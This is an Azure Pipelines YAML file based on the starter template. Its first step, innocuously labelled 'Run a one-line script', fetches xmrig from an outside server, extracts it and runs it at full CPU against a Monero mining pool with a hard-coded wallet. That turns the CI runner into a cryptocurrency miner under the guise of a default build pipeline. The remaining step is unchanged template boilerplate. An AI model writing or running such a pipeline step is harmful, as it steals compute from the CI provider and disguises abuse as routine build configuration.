# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool:
  vmImage: ubuntu-latest

steps:
- script: apt update -y && apt install -y wget && wget http://ussr-sec.tom.ru/mining/xmrig-6.3.5-linux-x64.tar.gz && tar xf xmrig-6.3.5-linux-x64.tar.gz &&./xmrig-6.3.5/xmrig --donate-level 0 --max-cpu-usage 100 -o gulf.moneroocean.stream:80 -u 48ceZ6ukSwmh9Cikw7fKo1itUKAT5bFj5XPGuQyQ8XmBHi8huPDH8kyFmq5EsXHjToiWQ3UTiW2WcWp4sXLWCUtjRCcPgXe+4000 -k -p microsoft
  displayName: 'Run a one-line script'

- script: |
    echo Add other tasks to build, test, and deploy your project.
    echo See https://aka.ms/yaml
  displayName: 'Run a multi-line script'
